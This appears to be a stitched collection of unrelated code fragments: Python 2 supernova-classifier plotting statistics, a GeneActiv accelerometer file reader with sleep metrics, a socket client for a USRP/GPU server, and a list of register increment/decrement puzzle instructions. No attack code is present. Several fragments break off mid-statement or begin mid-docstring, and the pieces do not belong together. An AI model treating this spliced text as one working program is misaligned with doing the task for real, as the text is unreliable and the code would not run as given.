CLFstats[data][TP]={Ia:(predict[data][Ia] & omask[Ia]),CC:(predict[data][CC] & omask[CC])}
CLFstats[data][FP]={Ia:(predict[data][Ia] & ~omask[Ia]),CC:(predict[data][CC] & ~omask[CC])}
if (args.nclass==3):
CLFstats[data][TP][II]= predict[data][II] & omask[II]
CLFstats[data][TP][Ibc]= predict[data][Ibc] & omask[Ibc]
CLFstats[data][FP][II]= predict[data][II] & ~omask[II]
CLFstats[data][FP][Ibc]= predict[data][Ibc] & ~omask[Ibc]
for t in MLtypes:
print 'Correct (true positive) number of {} Data {} = {}'.format(data,t, np.sum(CLFstats[data][TP][t]))
print 'Incorrect (false positive) number of {} Data {} = {}'.format(data,t,np.sum(CLFstats[data][FP][t]))
else:
print "{} data is unlabeled: true types not available".format(data)
#augment variables in data here
if ('true_mu' in obsdata.keys()):
obsdata[HR]=obsdata['mu']-obsdata['true_mu'] #Hubble Residual
#now fill dict if not already included
if(not(data in alldata.keys())):
alldata[data]={Ia:obsdata[obsIa],CC:obsdata[obsCC],Ibc:obsdata[obsIbc],II:obsdata[obsII],Total:obsdata}
#add CLFtype, TP and FP types to data dict
for t in MLtypes:
alldata[data][CLFid+t]=obsdata[predict[data][t]]
if(TP in CLFstats[data].keys()):
alldata[data][CLFid+TP+t]=obsdata[CLFstats[data][TP][t]]
alldata[data][CLFid+FP+t]=obsdata[CLFstats[data][FP][t]]
#add CLFTotal for consistency and weights; no totals for TP and FP types
alldata[data][CLFid+Total]=obsdata
#summarize extra data to be plotted
if(data in datalist):
print "\nPlotting",plotlabels[Data][data],'as "observed" data:'
for t in alldata[data].keys():
print "Number of type {} = {}".format(t,len(alldata[data][t]))
#endfor-datalist
#special printout here
if(data==Spec):
print alldata[Spec][RFFPIa]['snid']
print alldata[Spec][RFFPIa]['spec_eval']
print alldata[Spec][RFFPIa]['fit_pr']
print alldata[Spec][RFFPIa]['x1']
print alldata[Spec][RFFPIa]['c']
print alldata[Spec][RFFPIa]['z']
print alldata[Spec][RFFPIa]['mB']
#compute normalizations and weights for data plots (scale sims/secondary data by primary observed data set)
weights={}
if(len(datalist)>0):
data0=datalist[0] #primary observed dataset in datalist
#print alldata[data0].keys()
#lengths=[len(alldata[data0][key]) for key in alldata[data0].keys()]
#print lengths
for key in alldata.keys(): #compute renormalization factors
print '\nNormalization factors for {} Data:\n'.format(key)
weights={}
if(args.weights==ByType): #accumulate weights by type
norm={}
#for t in MLtypes + CLFtypes:
for t in MLtypes + CLFtypes + allTPFPtypes:
if(alldata[key].has_key(t) and len(alldata[key][t])>0): #t exists and has data
if (len(datalist)>0):
if(alldata[data0].has_key(t) and len(alldata[data0][t])>0): #t exists and has data
norm[t]=float(len(alldata[data0][t]))/float(len(alldata[key][t]))
else:
print "Type {} not available for {} Data".format(t,data0)
#for Phot data, only CLF weights available;
btyp=t[t.find('I'):len(t)] if 'I' in t else CC #parse t to find base SN type
subt=CLFid+btyp
print "Computing weights using type {} instead".format(subt)
if(alldata[key].has_key(subt) and len(alldata[key][subt])>0): #Training data doesn't have CLF types
norm[t]=float(len(alldata[data0][subt]))/float(len(alldata[key][subt]))
elif(alldata[key].has_key(btyp)):
print "Type {} not available for {} Data".format(subt,key)
norm[t]=float(len(alldata[data0][subt]))/float(len(alldata[key][btyp]))
print "Computing weights using type {} instead".format(btyp)
else:
"No appropriate substitute weights for {} in {} and {}".format(t, key, data0)
else:
norm[t]=1.0
weights[t]=np.array([norm[t]]*len(alldata[key][t]))
print "Setting up {} {} weights for type {}".format(len(alldata[key][t]), args.weights, t)
else:
norm[t]=0.0
print "No data: Skipping {} weights for type {}".format(args.weights, t)
print 'n({}) ={:0.3f}\n'.format(t, norm[t])
#Total weights need different values for each type
#Check cases for which type does not exist in data (no Ia etc. in Phot data)
#print norm.keys()
if (key!=Phot):
weights[Total]=np.array([norm[Ia]]*len(alldata[key][Total]))
if(key!=Training):
weights[CLFid+Total]=np.array([norm[CLFid+Ia]]*len(alldata[key][Total]))
if (key!=Phot) and (key!=Training):
#if (norm.has_key(CLFid+TP+Ia)):
weights[CLFid+TP+Total]=np.array([norm[CLFid+TP+Ia]]*len(alldata[key][Total]))
#else:
# weights[CLFid+TP+Total]=np.array([0.]*len(alldata[key][Total]))
#if (norm.has_key(CLFid+FP+Ia)):
weights[CLFid+FP+Total]=np.array([norm[CLFid+FP+Ia]]*len(alldata[key][Total]))
#else:
# weights[CLFid+FP+Total]=np.array([0.]*len(alldata[key][Total]))
if (args.nclass==3): #overwrite array to match MLtypes
if (key!=Phot):
weights[Total][mask[key][Ibc]]=norm[Ibc]
weights[Total][mask[key][II]]=norm[II]
if(key!=Training):
weights[CLFid+Total][predict[key][Ibc]]=norm[CLFid+Ibc]
weights[CLFid+Total][predict[key][II]]=norm[CLFid+II]
if (key!=Phot) and (key!=Training):
weights[CLFid+TP+Total][CLFstats[key][TP][Ibc]]=norm[CLFid+TP+Ibc]
weights[CLFid+FP+Total][CLFstats[key][FP][Ibc]]=norm[CLFid+FP+Ibc]
weights[CLFid+TP+Total][CLFstats[key][TP][II]]=norm[CLFid+TP+II]
weights[CLFid+FP+Total][CLFstats[key][FP][II]]=norm[CLFid+FP+II]
else:
if (key!=Phot):
weights[Total][mask[key][CC]]=norm[CC]
if(key!=Training):
weights[CLFid+Total][predict[key][CC]]=norm[CLFid+CC]
if (key!=Phot) and (key!=Training):
weights[CLFid+TP+Total][CLFstats[key][TP][CC]]=norm[CLFid+TP+CC]
weights[CLFid+FP+Total][CLFstats[key][FP][CC]]=norm[CLFid+FP+CC]
else:
#constant weights (calculate for all keys even if not needed for Training etc. data)
if (len(datalist)>0):
weights[Total]=np.array([float(len(alldata[data0]))/float(len(alldata[key]))]*len(alldata[key][Total]))
else:
weights[Total]=np.array([1.0]*len(alldata[key][Total]))
weights[CLFid+Total]=weights[Total]
weights[CLFid+TP+Total]=weights[Total]
weights[CLFid+FP+Total]=weights[Total]
#save in dict
alldata[key][Weights]=weights
#print key,alldata[key][Weights].keys()
#old format
#Iaweights=np.array([normIa]*len(sim[Ia]))
#CCweights=np.array([normCC]*len(sim[CC]))
#Ibcweights=np.array([normIbc]*len(sim[Ibc]))
#IIweights=np.array([normII]*len(sim[II]))
#save SN Totals in dict for cuts
SNTotals={}
for key in alldata.keys():
SNTotals[key]={}
for t in plottypes:
if(t in alldata[key].keys()):
SNTotals[key][t]=float(len(alldata[key][t]))
#print key, t, SNTotals[key][t]
print '\nDefault plottypes=',str(plottypes)
# PLOT VARIABLES ###################
npages=1
###################################################################
#page probs
print "\nStarting page",npages,"(page probs)"
#populate dict of probabilities for Test Data using array from probs dict
CLFprobs={}
data = Test
for t in MLtypes:
CLFprobs[t]={'probs':probs[data][true[data][t]]}
fig = plt.figure(figsize=(15,7))
p_binwidth = 0.05
p_bins = np.arange(-0.1, 1.05, p_binwidth)
f = fig.add_subplot(231)
plot_types(MLtypes,'probs',CLFprobs,xlabel='Random Forest | |
<gh_stars>1-10
import pandas as pd
import struct
import numpy as np
from more_itertools import run_length
from bitstring import BitArray
from scipy import signal
def bin2df(full_path):
"""
Reads geneactiv .bin files into a pandas dataframe.
Parameters
----------
full_path : str
Full path to the geneactiv .bin file.
Returns
-------
decode : dataframe
Dataframe of decoded geneactiv data.
"""
with open(full_path, "rb") as in_file:
full_line = in_file.readline()
count = 0
fs = ""
df = []
while full_line:
full_line = in_file.readline()
line = full_line[:].split(b"\r\n")[0]
count += 1
if count < 60:
if b"x gain" in line:
x_gain = int(line.split(b":")[-1])
if b"x offset" in line:
x_offset = int(line.split(b":")[-1])
if b"y gain" in line:
y_gain = int(line.split(b":")[-1])
if b"y offset" in line:
y_offset = int(line.split(b":")[-1])
if b"z gain" in line:
z_gain = int(line.split(b":")[-1])
if b"z offset" in line:
z_offset = int(line.split(b":")[-1])
if b"Volts" in line:
volts = int(line.split(b":")[-1])
if b"Lux" in line:
lux = int(line.split(b":")[-1])
if b"Page Time:" in line:
time = pd.to_datetime(
":".join(line.decode().split(":")[1:])[0:-2],
format="%Y-%m-%d %H:%M:%S:%f",
)
if b"Temperature:" in line:
temp = float(line.split(b":")[-1])
if not fs:
if b"Measurement Frequency:" in line:
fs = float(line.split(b":")[-1].split(b" ")[0])
offset = np.array([1 / fs] * 300) * np.arange(0, 300)
delta = pd.to_timedelta(offset, unit="s")
if len(line) == 3600:
# hex to bin
hexes = struct.unpack(b"12s " * 300, line)
bins = (
struct.unpack(
b"12s 12s 12s 10s 1s 1s",
bin(int(hx, 16))[2:].zfill(48).encode(),
)
for hx in hexes
)
decode = pd.DataFrame(
bins,
columns=["X", "Y", "Z", "LUX", "Button", "_"],
index=pd.DatetimeIndex([time] * 300) + delta,
)
# binary to decimal and calibration
decode.X = decode.X.apply(
lambda x: round(
(BitArray(bin=x.decode()).int * 100.0 - x_offset) / x_gain, 4
)
)
decode.Y = decode.Y.apply(
lambda x: round(
(BitArray(bin=x.decode()).int * 100.0 - y_offset) / y_gain, 4
)
)
decode.Z = decode.Z.apply(
lambda x: round(
(BitArray(bin=x.decode()).int * 100.0 - z_offset) / z_gain, 4
)
)
decode.LUX = decode.LUX.apply(lambda x: int(int(x, 2) * lux / volts))
decode["T"] = temp
df.append(decode)
df = pd.concat(df, axis=0)
df.index.name = "Time"
df.to_csv(r'C:\Users\tdavi\Desktop\demo_data.csv', index=False, header=True)
return df[["X", "Y", "Z", "LUX", "T"]]
def non_overlapping_windows(df, window_size):
"""
Slices input data frame into windows of specified size.
Parameters
----------
df : data frame
Data frame to be windowed along the vertical axis.
window_size : int
Window size in number of samples.
Returns
-------
windowed_data : numpy array
Data windowed to the specified size.
"""
data_mat = np.asarray(df)
r, c = data_mat.shape
num_windows = r // window_size
data_mat = data_mat[0 : num_windows * window_size, :]
windowed_data = data_mat.reshape(num_windows, window_size, c)
return windowed_data
def activity_index(windowed_array):
"""
Compute activity index of windowed tri-axis accelerometer signal.
Activity index defined here as:
sqrt(mean(vx, vy, vz))
where vx, vy, vz are the variances in x, y, z
Activity index accounting for device specific systematic variance is defined as:
sqrt(max(mean(vx-vsx, vy-vsy, vz-vsz), 0))
where vx, vy, vz are defined as above and vsx, vsy, vsz are the axis
specific systematic variances
Parameters
----------
windowed_array : array-like
Full X,Y,Z tri-axis accelerometer signal with dimensions [number of windows, size of window, 3]
Returns
-------
activity_indices : array-like
Array of activity indices for input signal.
"""
activity_indices = (np.var(windowed_array, axis=2).mean(axis=1) ** 0.5).reshape(
-1, 1
)
return activity_indices
def high_pass_filter(windowed_array, sampling_rate, hp_cutoff, order):
"""
High-pass filter a given windowed sensor signal.
Parameters
----------
windowed_array : array-like
Sensor signal windowed with shape [number_of_windows, samples_per_window, number_of_data_channels].
sampling_rate : float
hp_cutoff : float
High pass filter cutoff.
order : int
Order of the filter.
Returns
-------
filtered : array-like
High pass filtered data.
"""
critical_frequency = [hp_cutoff * 2.0 / sampling_rate]
# NUMERATOR AND DENOMINATOR OF IIR filter
[b, a] = signal.butter(
N=order, Wn=critical_frequency, btype="highpass", analog=False
)
# APPLY FILTER
filtered = signal.filtfilt(b, a, windowed_array, padlen=10, axis=1)
return filtered
def load_geneactiv_csv(full_path):
"""
Loads geneactiv csv data into a pandas dataframe.
Parameters
----------
full_path : string
Full path to a geneactiv accelerometer csv file.
Returns
-------
df : data frame
Pandas data frame of geneactiv accelerometer data including temperature and light.
"""
df = pd.read_csv(
full_path,
index_col=0,
skiprows=100,
header=None,
names=["Time", "X", "Y", "Z", "LUX", "Button", "T"],
usecols=["Time", "X", "Y", "Z", "LUX", "T"],
dtype={
"Time": object,
"X": np.float64,
"Y": np.float64,
"Z": np.float64,
"LUX": np.int64,
"Button": bool,
"T": np.float64,
},
low_memory=False,
)
df.index = pd.to_datetime(df.index, format="%Y-%m-%d %H:%M:%S:%f").values
return df[["X", "Y", "Z", "LUX", "T"]]
def downsample_by_mean(df, fs="50L"):
"""
Downsamples a pandas data frame to a desired frequency by mean based aggregation.
Parameters
----------
df : data frame
Data to be downsampled. Data frame must have pandas date time index.
fs : str
New sampling rate in string format.
Returns
-------
downsampled data frame
"""
return df.resample(fs).mean()
def downsample(df, factor):
"""
Downsamples a pandas data frame to a desired frequency after using an antialiasing filter.
Parameters
----------
df : data frame
Data to be downsampled.
factor : int
Factor by which to downsample.
Returns
-------
df : data frame
Downsampled data frame
"""
# START AND STOP OF INDEX
start = df.index[0]
end = df.index[-1]
# COLUMN NAMES
cols = df.columns
# DOWNSAMPLE
ds = signal.decimate(df.values, q=factor, axis=0)
# BUILD INDEX
idx = pd.date_range(start, end, len(ds))
# RECONSTRUCT DATA FRAME
df = pd.DataFrame(ds)
df.index = idx
df.columns = cols
return df
def make_dummy_data(freq="50L"):
"""
Makes dummy sleep data. Default dummy data is 24 hours at 20hz. Sleep window from 10pm to 8am. Temperature set at 27
degrees celsius.
Parameters
----------
freq : string
Frequency expressed as string. 20hz Default expressed as "50L". 100hz as "10L".
Returns
-------
input_df, start_sleep, end_sleep : 3-tuple of data frame, date-time object, date-time object
Dataframe of dummy sleep data, start of sleep window, end of sleep window.
"""
# START AND END DATES
start = pd.to_datetime("2018-01-01 12:00:00:000", format="%Y-%m-%d %H:%M:%S:%f")
end = pd.to_datetime("2018-01-02 12:00:00:000", format="%Y-%m-%d %H:%M:%S:%f")
# SLEEP PERIOD
start_sleep = pd.to_datetime(
"2018-01-01 22:00:00:000", format="%Y-%m-%d %H:%M:%S:%f"
)
end_sleep = pd.to_datetime("2018-01-02 7:00:00:000", format="%Y-%m-%d %H:%M:%S:%f")
# DUMMY DATE
time = pd.date_range(start, end, freq=freq)
data = np.random.uniform(-100, 100, [len(time), 5])
# DATA FRAME
input_df = pd.DataFrame(data)
input_df.columns = ["X", "Y", "Z", "T", "LUX"]
input_df.index = time
# INSERT SLEEP PERIOD + TEMPERATURE VALUES
input_df[start_sleep:end_sleep] = 0.001
input_df["T"] = 27.0
input_df["LUX"] = np.random.uniform(0, 80, [len(time)])
return input_df, start_sleep, end_sleep
# # START AND END DATES
# start = pd.to_datetime("2018-01-01 12:00:00:000", format="%Y-%m-%d %H:%M:%S:%f")
# end = pd.to_datetime("2018-01-02 12:00:00:000", format="%Y-%m-%d %H:%M:%S:%f")
#
# # SLEEP PERIOD
# start_sleep = pd.to_datetime(
# "2018-01-01 22:00:00:000", format="%Y-%m-%d %H:%M:%S:%f"
# )
# end_sleep = pd.to_datetime("2018-01-02 7:00:00:000", format="%Y-%m-%d %H:%M:%S:%f")
def import_dummy_data(json_data, freq="50L"):
"""
Makes dummy sleep data. Default dummy data is 24 hours at 20hz. Sleep window from 10pm to 8am. Temperature set at 27
degrees celsius.
Parameters
----------
freq : string
Frequency expressed as string. 20hz Default expressed as "50L". 100hz as "10L".
Returns
-------
input_df, start_sleep, end_sleep : 3-tuple of data frame, date-time object, date-time object
Dataframe of dummy sleep data, start of sleep window, end of sleep window.
"""
# START AND END DATES
start = pd.to_datetime("2018-01-01 12:00:00:000", format="%Y-%m-%d %H:%M:%S:%f")
end = pd.to_datetime("2018-01-02 2:33:48:700", format="%Y-%m-%d %H:%M:%S:%f")
# SLEEP PERIOD
start_sleep = pd.to_datetime(
"2018-01-01 22:00:00:000", format="%Y-%m-%d %H:%M:%S:%f"
)
end_sleep = pd.to_datetime("2018-01-02 7:00:00:000", format="%Y-%m-%d %H:%M:%S:%f")
# DUMMY DATE
time = pd.date_range(start, end, freq=freq)
df = pd.DataFrame(json_data, columns=["X", "Y", "Z", "T", "LUX"], index=time)
return df, start_sleep, end_sleep
def total_sleep_time(predictions):
"""
Calculates total sleep time on an array of sleep/wake predictions in one minute epochs.
Parameters
----------
predictions : array-like
Binary sleep/wake predictions. Awake encoded as 1 and sleep as 0.
Returns
-------
tst : int
Total time spent asleep based on sleep/wake predictions provided.
"""
tst = len(predictions) - predictions.sum()
return int(tst)
def percent_time_asleep(predictions):
"""
Calculates the percent of time spent asleep on an array of sleep/wake predictions in one minute epochs.
Parameters
----------
predictions : array-like
Binary sleep/wake predictions. Awake encoded as 1 and sleep as 0.
Returns
-------
pta : float
Percentage of time spent asleep based on sleep/wake predictions provided.
"""
pta = 100.0 * (len(predictions) - predictions.sum()) / float(len(predictions))
return np.round(pta, decimals=3)
def number_of_wake_bouts(predictions):
"""
Calculates the number of wake bouts present in an array of sleep/wake predictions in one minute epochs. Number of
| |
port.
- timeout: timeout in seconds to wait for connection.
Known bugs:
- On some linux distribution once on two attempts the connection is denied by software. On third attempt however it connects.
Returns:
- True: if connection was succesfull.
- False if no connection was established.
Examples:
>>> if(USRP_socket_bind(USRP_data_socket, USRP_server_address_data, 5)):
# do stuff with function in this library
>>> else:
>>> print "No connection, check hardware and configs."
Notes:
- This method will only connect one soket to the USRP/GPU server, not data and async messages. This function is intended to be used in higher level functions contained in this library. The correct methot for connecting to USRP/GPU server is the use of USERP_Connect(timeout) function.
"""
if timeout < 0:
print_warning("No GPU server connection established after timeout.")
return False
else:
try:
USRP_socket.connect(server_address)
return True
except socket.error as msg:
print(("Socket binding " + str(msg) + ", " + "Retrying..."))
return False
USRP_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
USRP_socket.settimeout(1)
USRP_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
time.sleep(1)
timeout = timeout - 1
return USRP_socket_bind(USRP_socket, server_address, timeout)
def Decode_Sync_Header(raw_header, CLIENT_STATUS=CLIENT_STATUS):
'''
Decode an async header containing the metadata of the packet.
Return:
- The metadata in dictionary form.
Arguments:
- The raww header as a string (as returned by the recv() method of socket).
'''
def decode_frontend(code):
return {
'A': "A_TXRX",
'B': "A_RX2",
'C': "B_TXRX",
'D': "B_RX2"
}[code]
try:
header = np.fromstring(raw_header, dtype=header_type, count=1)
metadata = {}
metadata['usrp_number'] = header[0]['usrp_number']
metadata['front_end_code'] = decode_frontend(header[0]['front_end_code'])
metadata['packet_number'] = header[0]['packet_number']
metadata['length'] = header[0]['length']
metadata['errors'] = header[0]['errors']
metadata['channels'] = header[0]['channels']
return metadata
except ValueError:
if CLIENT_STATUS["keyboard_disconnect"] == False:
print_error("Received corrupted header. No recover method has been implemented.")
return None
def Print_Sync_Header(header):
print "usrp_number" + str(header['usrp_number'])
print "front_end_code" + str(header['front_end_code'])
print "packet_number" + str(header['packet_number'])
print "length" + str(header['length'])
print "errors" + str(header['errors'])
print "channels" + str(header['channels'])
def Decode_Async_header(header):
''' Extract the length of an async message from the header of an async package incoming from the GPU server'''
header = np.fromstring(header, dtype=np.int32, count=2)
if header[0] == 0:
return header[1]
else:
return 0
def Decode_Async_payload(message):
'''
Decode asynchronous payloads coming from the GPU server
'''
global ERROR_STATUS, END_OF_MEASURE, REMOTE_FILENAME, EOM_cond
try:
res = json.loads(message)
except ValueError:
print_warning("Cannot decode response from server.")
return
try:
atype = res['type']
except KeyError:
print_warning("Unexpected json string from the server: type")
# print "FROM SERVER: "+str(res['payload'])
if atype == 'ack':
if res['payload'].find("EOM") != -1:
print_debug("Async message from server: Measure finished")
EOM_cond.acquire()
END_OF_MEASURE = True
EOM_cond.release()
elif res['payload'].find("filename") != -1:
REMOTE_FILENAME = res['payload'].split("\"")[1]
else:
print_debug("Ack message received from the server: " + str(res['payload']))
if atype == 'nack':
print_warning("Server detected an error.")
ERROR_STATUS = True
EOM_cond.acquire()
END_OF_MEASURE = True
EOM_cond.release()
def Encode_async_message(payload):
'''
Format a JSON string so that the GPU server can read it.
Arguments:
- payload: A JSON string.
Returns:
- A formatted string ready to be sent via socket method
Note:
This function performs no check on the validity of the JSON string.
'''
return struct.pack('I', 0) + struct.pack('I', len(payload)) + payload
def Async_send(payload):
'''
Send a JSON string to the GPU server. Typically the JSON string represent a command or a status request.
Arguments:
-payload: JSON formatted string.
Returns:
-Boolean value representing the success of the operation.
Note:
In order to use this function the Async_thread has to be up and running. See Start_Async_RX().
'''
global Async_condition
global Async_status
global USRP_socket
if (Async_status):
# send the data
try:
USRP_socket.send(Encode_async_message(payload))
except socket.error as err:
print_warning("An async message could not be sent due to an error: " + str(err))
if err.errno == 32:
print_error("Async server disconnected")
Async_condition.acquire()
Async_status = False
Async_condition.release()
return False
return True
else:
print_warning("The Async RX thread is not running, cannot send Async message.")
return False
def Async_thread():
'''Receiver thread for async messages from the GPU server. This function is ment to be run as a thread'''
global Async_condition
global Async_status
global USRP_socket
global USRP_server_address
internal_status = True
Async_status = False
# the header iscomposed by two ints: one is always 0 and the other represent the length of the payload
header_size = 2 * 4
# just initialization of variables
old_header_len = 0
old_data_len = 0
# try to connect, if it fails set internal status to False (close the thread)
Async_condition.acquire()
# if(not USRP_socket_bind(USRP_socket, USRP_server_address, 5)):
time_elapsed = 0
timeout = 10 # sys.maxint
data_timeout_wait = 0.01
connected = False
while time_elapsed < timeout and (not connected):
try:
print_debug("Async command thread:")
connected = USRP_socket_bind(USRP_socket, USRP_server_address, 7)
time.sleep(1)
time_elapsed += 1
except KeyboardInterrupt:
print_warning("Keyboard interrupt aborting connection...")
break
if not connected:
internal_status = False
Async_status = False
print_warning("Async data connection failed")
Async_condition.release()
else:
Async_status = True
print_debug("Async data connected")
Async_condition.release()
# acquisition loop
while (internal_status):
# counter used to prevent the API to get stuck on sevrer shutdown
data_timeout_counter = 0
data_timeout_limit = 5
header_timeout_limit = 5
header_timeout_counter = 0
header_timeout_wait = 0.1
# lock the "mutex" for checking the state of the main API instance
Async_condition.acquire()
if Async_status == False:
internal_status = False
Async_condition.release()
size = 0
if (internal_status):
header_data = ""
try:
while (len(header_data) < header_size) and internal_status:
header_timeout_counter += 1
header_data += USRP_socket.recv(min(header_size, header_size - len(header_data)))
if old_header_len != len(header_data):
header_timeout_counter = 0
if (header_timeout_counter > header_timeout_limit):
time.sleep(header_timeout_wait)
Async_condition.acquire()
if Async_status == False:
internal_status = False
# print internal_status
Async_condition.release()
old_header_len = len(header_data)
# general timer
time.sleep(.1)
if (internal_status): size = Decode_Async_header(header_data)
except socket.error as msg:
if msg.errno != None:
print_error("Async header: " + str(msg))
Async_condition.acquire()
internal_status = False
Async_status = False
Async_condition.release()
if (internal_status and size > 0):
data = ""
try:
while (len(data) < size) and internal_status:
data_timeout_counter += 1
data += USRP_socket.recv(min(size, size - len(data)))
if old_data_len != len(data):
data_timeout_counter = 0
if (data_timeout_counter > data_timeout_limit):
time.sleep(data_timeout_wait)
Async_condition.acquire()
if Async_status == False:
internal_status = False
Async_condition.release()
old_data_len = len(data)
if (internal_status): Decode_Async_payload(data)
except socket.error as msg:
if msg.errno == 4:
pass # the ctrl-c exception is handled elsewhere
elif msg.errno != None:
print_error("Async thread: " + str(msg))
Async_condition.acquire()
internal_status = False
Async_status = False
Async_condition.release()
print_warning("Async connection is down: " + msg)
USRP_socket.shutdown(1)
USRP_socket.close()
del USRP_socket
gc.collect()
Async_RX_loop = Thread(target=Async_thread, name="Async_RX", args=(), kwargs={})
Async_RX_loop.daemon = True
def Wait_for_async_connection(timeout=None):
'''
Block until async thead has established a connection with the server or the thread is expired. In case a timeout value is given, returns after timeout if no connection is established before.
Arguments:
- timeout: Second to wait for connection. Default is infinite timeout
Return:
- boolean representing the sucess of the operation.
'''
global Async_condition
global Async_status
time_elapsed = 0
if timeout is None:
timeout = sys.maxint
try:
while time_elapsed < timeout:
Async_condition.acquire()
x = Async_status
Async_condition.release()
time.sleep(1)
if x:
break
else:
time_elapsed += 1
except KeyboardInterrupt:
print_warning("keyboard interrupt received. Closing connections.")
return False
return x
def Wait_for_sync_connection(timeout=None):
'''
Block until async thead has established a connection with the server or the thread is expired. In case a timeout value is given, returns after timeout if no connection is established before.
Arguments:
- timeout: Second to wait for connection. Default is infinite timeout
Return:
- boolean representing the sucess of the operation.
'''
global Sync_RX_condition
global CLIENT_STATUS
time_elapsed = 0
x = False
if timeout is None:
timeout = sys.maxint
try:
while time_elapsed < timeout:
Sync_RX_condition.acquire()
x = CLIENT_STATUS['Sync_RX_status']
Sync_RX_condition.release()
time.sleep(1)
if x:
break
else:
time_elapsed += 1
except KeyboardInterrupt:
print_warning("keyboard interrupt received. Closing connections.")
return False
return x
def Start_Async_RX():
'''Start the Aswync thread. See Async_thread() function for a more detailed explanation.'''
global Async_RX_loop
reinit_async_socket()
try:
Async_RX_loop.start()
except RuntimeError:
Async_RX_loop = Thread(target=Async_thread, name="Async_RX", args=(), kwargs={})
Async_RX_loop.daemon = True
Async_RX_loop.start()
# print "Async RX thread launched"
def Stop_Async_RX():
'''Stop the Async thread. See Async_thread() function for a more detailed explanation.'''
global Async_RX_loop, Async_condition, Async_status
Async_condition.acquire()
print_line("Closing Async RX thread...")
Async_status = False
Async_condition.release()
Async_RX_loop.join()
print_line("Async RX stopped")
def Connect(timeout=None):
'''
Connect both, the Syncronous and Asynchronous communication service.
Returns:
- True if both services are connected, False otherwise.
Arguments:
- the timeout in seconds. | |
== -1753
mmw inc -16 if t > 2911
eri dec 502 if um <= -785
hg inc 134 if x != -2775
lx dec 263 if kg <= 2978
hg dec 83 if es != -1235
mmw dec -837 if umr <= 693
dy inc 148 if um < -792
gk inc -13 if j > -247
x dec 749 if yk >= -568
lbf inc 606 if is != 2489
x inc 588 if dy >= 2345
dy dec 243 if yk <= -574
umr dec 1 if es == -1233
f dec 104 if t == 2903
aao dec 32 if es != -1224
x inc 882 if j < -245
hg inc -998 if uy == 890
dy dec -605 if dy <= 2115
hg inc 45 if gk != -1769
lbf inc -521 if t > 2894
umr inc -115 if a != 1473
lx dec -795 if x == -2194
t inc 143 if f < -1154
es dec 629 if is > 2494
lbf inc 195 if fk <= -263
fk inc 926 if aao <= -2153
um inc 351 if es != -1230
t dec -541 if lx != 316
mmw inc -329 if mmw != 4178
dy inc 708 if is > 2481
j inc 386 if t != 3050
hg dec 253 if umr == 568
um inc 236 if mmw >= 4172
fk inc -874 if hg != 1328
lbf dec -499 if um != -202
lbf dec 999 if gk > -1774
gk dec 474 if fk > -219
mmw dec -598 if yk > -585
fk inc -508 if t == 3046
mmw inc -638 if x == -2193
f dec 756 if a == 1477
mmw dec -339 if aao > -2161
um inc 109 if lbf <= -578
fk dec -421 if lx < 321
is inc -725 if ada >= -1226
fk dec -458 if ada >= -1226
uy dec -588 if aao <= -2160
ada inc 404 if dy != 3420
x inc 788 if f <= -1910
kg dec -520 if is == 1754
es dec 895 if lbf < -568
fk dec -999 if lbf == -578
kg dec -38 if lbf != -574
uy inc 343 if lbf != -579
is dec -176 if es <= -2125
lbf dec -680 if lbf < -573
eri inc 562 if uy != 1823
x inc 87 if fk >= 1158
umr dec -850 if eri > -1843
um inc -978 if eri <= -1849
x dec 389 if gk < -2241
f inc -288 if a != 1486
kg dec -484 if uy < 1826
lx dec -328 if lbf != 97
um inc -998 if gk <= -2240
yk inc 314 if mmw <= 5120
t dec -884 if es == -2128
uy dec 190 if f <= -2199
lx dec 128 if umr > 1425
eri inc 807 if a > 1485
ada inc 272 if umr < 1422
hg inc 630 if is == 1937
um dec 143 if ada >= -949
eri dec -334 if lx != 637
fk dec 147 if umr < 1426
gk dec 309 if uy == 1631
aao dec 233 if hg == 1336
is dec 825 if yk > -271
lbf dec -498 if umr <= 1413
kg dec 473 if es > -2131
mmw dec -728 if hg != 1327
dy dec 309 if hg <= 1341
dy inc -863 if kg >= 3023
x inc -465 if lx <= 647
a inc 253 if x >= -1793
kg inc -184 if eri < -1500
um inc -527 if lx != 652
j inc -455 if hg > 1328
eri inc 866 if yk != -263
aao inc -47 if gk > -2553
gk inc 228 if gk < -2554
gk inc -493 if fk <= 1006
mmw inc 800 if x == -1784
lbf inc -351 if umr < 1426
a inc -903 if ada > -958
umr inc 942 if es != -2128
dy inc 600 if a < 830
j dec -247 if lx < 646
gk dec -922 if t >= 3930
mmw inc -114 if lx != 654
fk dec 415 if um > -1764
t inc -763 if lbf < -246
ada inc 818 if is > 1108
uy inc -839 if t != 3171
fk inc -335 if is > 1106
fk dec -335 if yk == -263
fk inc -291 if dy == 3711
lx dec -665 if yk != -263
es dec -772 if uy != 792
umr dec -528 if um != -1764
t dec -95 if es < -2137
es inc -800 if yk >= -261
kg inc 150 if j >= -70
f dec -118 if mmw < 6536
a inc 595 if uy > 794
is inc 927 if lx > 636
eri dec -61 if x != -1785
hg inc -878 if yk != -260
gk inc -727 if fk <= 305
mmw dec -945 if a <= 833
aao inc -101 if x >= -1792
hg dec 567 if es > -2131
gk inc -689 if mmw < 7484
ada inc -644 if eri > -1452
yk inc -810 if yk > -265
um dec 655 if aao < -2533
t dec 179 if umr != 1943
gk inc 833 if hg >= -110
fk dec 998 if fk < 315
a dec -558 if aao > -2543
x inc 426 if lbf == -249
uy inc 892 if yk > -1075
umr inc 250 if es <= -2127
mmw inc -727 if umr >= 2193
kg dec 111 if es == -2128
dy dec 898 if fk != -693
yk dec 168 if umr >= 2191
uy dec 113 if dy <= 3711
mmw inc -752 if yk == -1241
yk inc -181 if t > 2989
mmw dec -636 if t < 2995
a inc -424 if hg == -109
j dec -762 if ada > -780
lx dec 565 if uy <= 1577
aao dec 858 if j == 697
fk inc -383 if a < 969
eri inc -51 if lx <= 85
aao inc 666 if j > 690
t dec 234 if a == 964
aao inc -69 if fk > -1085
es inc -721 if gk >= -2215
is inc -185 if lbf > -251
mmw dec 411 if es == -2849
f dec -214 if gk == -2210
yk inc 904 if aao >= -2804
es inc 883 if mmw != 6210
x dec 6 if ada != -774
aao inc -776 if um != -2419
j inc -653 if yk == -344
gk dec 338 if fk != -1072
yk inc -13 if x >= -1360
lbf inc 201 if dy < 3716
yk dec -904 if aao != -3575
f dec 922 if j == 697
uy dec -562 if lbf != -53
gk dec 50 if lbf <= -47
t inc -670 if mmw > 6222
lx inc 515 if uy == 2133
yk inc 261 if dy > 3704
x dec -854 if uy == 2133
